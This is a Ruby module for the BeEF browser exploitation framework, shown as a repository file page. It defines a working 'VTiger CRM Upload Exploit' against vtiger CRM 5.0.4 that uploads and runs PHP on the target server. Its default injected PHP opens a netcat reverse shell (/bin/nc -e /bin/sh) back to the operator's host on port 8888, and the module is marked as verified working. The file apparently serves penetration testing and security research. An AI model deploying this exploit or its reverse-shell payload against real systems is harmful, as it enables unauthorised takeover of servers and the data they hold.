35f62714b1
git-svn-id: https://beef.googlecode.com/svn/trunk@908 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
48 lines
1.7 KiB
Ruby
48 lines
1.7 KiB
Ruby
class Vtiger_crm_upload_exploit < BeEF::Core::Command
|
|
|
|
def initialize
|
|
time = Time.new
|
|
weekno = case time.day
|
|
when 1..7 then 1
|
|
when 8..14 then 2
|
|
when 15..21 then 3
|
|
when 22..28 then 4
|
|
else 5
|
|
end
|
|
|
|
@configuration = BeEF::Core::Configuration.instance
|
|
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
|
|
|
|
super({
|
|
'Name' => 'VTiger CRM Upload Exploit',
|
|
'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM <a href="http://www.vtiger.com/">vtiger 5.0.4</a><br />The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888',
|
|
'Category' => 'Network',
|
|
'Author' => ['wade', 'bm', 'pipes', 'xntrik'],
|
|
'Data' =>
|
|
[
|
|
{'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
|
|
{'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},
|
|
{'name'=>'vtiger_php','ui_label'=>'Injected PHP','value'=>'passthru("/bin/nc -e /bin/sh '+beef_host+' 8888");','type'=>'textarea','width'=>'400px','height'=>'100px'},
|
|
{'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'}
|
|
],
|
|
'File' => __FILE__
|
|
})
|
|
|
|
set_target({
|
|
'verified_status' => VERIFIED_WORKING,
|
|
'browser_name' => ALL
|
|
})
|
|
|
|
use 'beef.net.local'
|
|
|
|
use_template!
|
|
end
|
|
|
|
def callback
|
|
return if @datastore['result'].nil?
|
|
|
|
save({'result' => @datastore['result']})
|
|
end
|
|
|
|
end
|